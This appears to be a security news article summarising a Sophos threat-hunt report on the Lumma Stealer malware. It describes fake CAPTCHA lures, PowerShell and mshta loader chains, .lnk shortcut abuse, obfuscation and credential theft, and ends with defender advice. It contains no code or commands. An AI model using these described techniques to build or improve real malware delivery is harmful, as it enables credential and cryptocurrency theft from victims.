The Lumma Stealer malware has demonstrated new levels of technical sophistication over the fall and winter of 2024-25, leveraging advanced PowerShell scripting, multi-stage payload delivery, and obfuscation techniques to subvert both user trust and endpoint security measures.
Initially discovered in a late 2024 threat hunt by Sophos Managed Detection and Response (MDR), Lumma Stealer campaigns have been observed employing deceptive fake CAPTCHA websites and malicious downloads to achieve initial infection, followed by a complex sequence of fileless code execution and data exfiltration.
A Technical Profile: From MaaS to Mass Infections
Lumma Stealer, active since mid-2022 and attributed to a Russian-speaking developer, operates under a Malware-as-a-Service (MaaS) model, offering regular updates, user support, and distribution channels via Telegram and dedicated online documentation.
The malware’s target set includes credentials, session tokens, cryptocurrency wallets, and sensitive personal data.
Analysts note that the infection cadence of Lumma Stealer has risen sharply in recent months, in part due to advancements in both its delivery and execution chains.
The vector most emblematic of Lumma Stealer’s evolution involves the weaponization of fake CAPTCHA sites.
Victims, lured by offers of software downloads or other social engineering ploys, are presented with plausible verification challenges-CAPTCHA boxes indistinguishable from those seen across legitimate web services.
Upon passing the fake puzzle, targets are redirected to secondary pages instructing them to execute a PowerShell-encoded command via the Windows Run dialog.
This simple user action triggers a hidden JavaScript routine that copies a sophisticated PowerShell script to the Clipboard and executes it in a concealed window.
The script in question retrieves a secondary PowerShell payload from an attacker-controlled server and leverages the Invoke-Expression cmdlet to execute its contents, effectively staging the Lumma Stealer binary for further deployment.
Obfuscated Loaders and Multi-Stage Execution
Analysis of infection chains reveals that the retrieved PowerShell scripts are not merely downloaders; they serve as multi-stage loaders, often fetching an encrypted ZIP archive containing the actual Lumma Stealer executable.
In observed campaigns, this payload is extracted into system folders such as %AppData% and executed under misleading names (e.g., ‘ArtistSponsorship.exe’) to evade user suspicion and basic detection heuristics.
Once operational, Lumma Stealer employs heavily obfuscated AutoIt scripts, shellcode injections, and direct connections to command-and-control (C2) infrastructure.
The malware systematically harvests login credentials, cryptocurrency wallets, session cookies, and browser data-most notably from Chrome-before exfiltrating the entire dataset to external servers via covert channels. The infection process is engineered to terminate itself post-exfiltration, minimizing residual footprint.
Beyond social engineering with CAPTCHAs, Lumma Stealer actors are deploying disguised .lnk shortcut files masquerading as benign PDFs.
Upon execution, these launch deeply obfuscated PowerShell code through the sftp.exe ProxyCommand feature, which in turn invokes mshta.exe to download and run remote scripts.
The scripts use AES encryption for payload concealment, with decrypted code emerging as portable executable (PE) files that execute additional malware.
Subsequent payload stages resolve critical Windows APIs at runtime-such as GetProcAddress and VirtualProtect-and dynamically download further obfuscated scripts.
These scripts continuously evolve, with code filled with misleading variable names and comments to stymie analysis and bypass static detection mechanisms.
Given Lumma Stealer’s modular approach and the adaptability of its delivery mechanisms, defenders are advised to combine behavioral endpoint protections with targeted user education.
Sophos recommends ongoing monitoring for suspicious PowerShell and process execution chains, careful review of browser histories for evidence of malicious CAPTCHA or verification redirects, and regular analysis of endpoint telemetry for anomalous file operations and C2 communications.
The use of fake CAPTCHA sites as a launchpad for fileless attacks represents a particularly insidious innovation, exploiting users’ ingrained trust in web security norms.
As Lumma Stealer’s techniques continue to evolve, organizations must remain vigilant, blending advanced technical controls with renewed scrutiny of seemingly routine user interactions.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
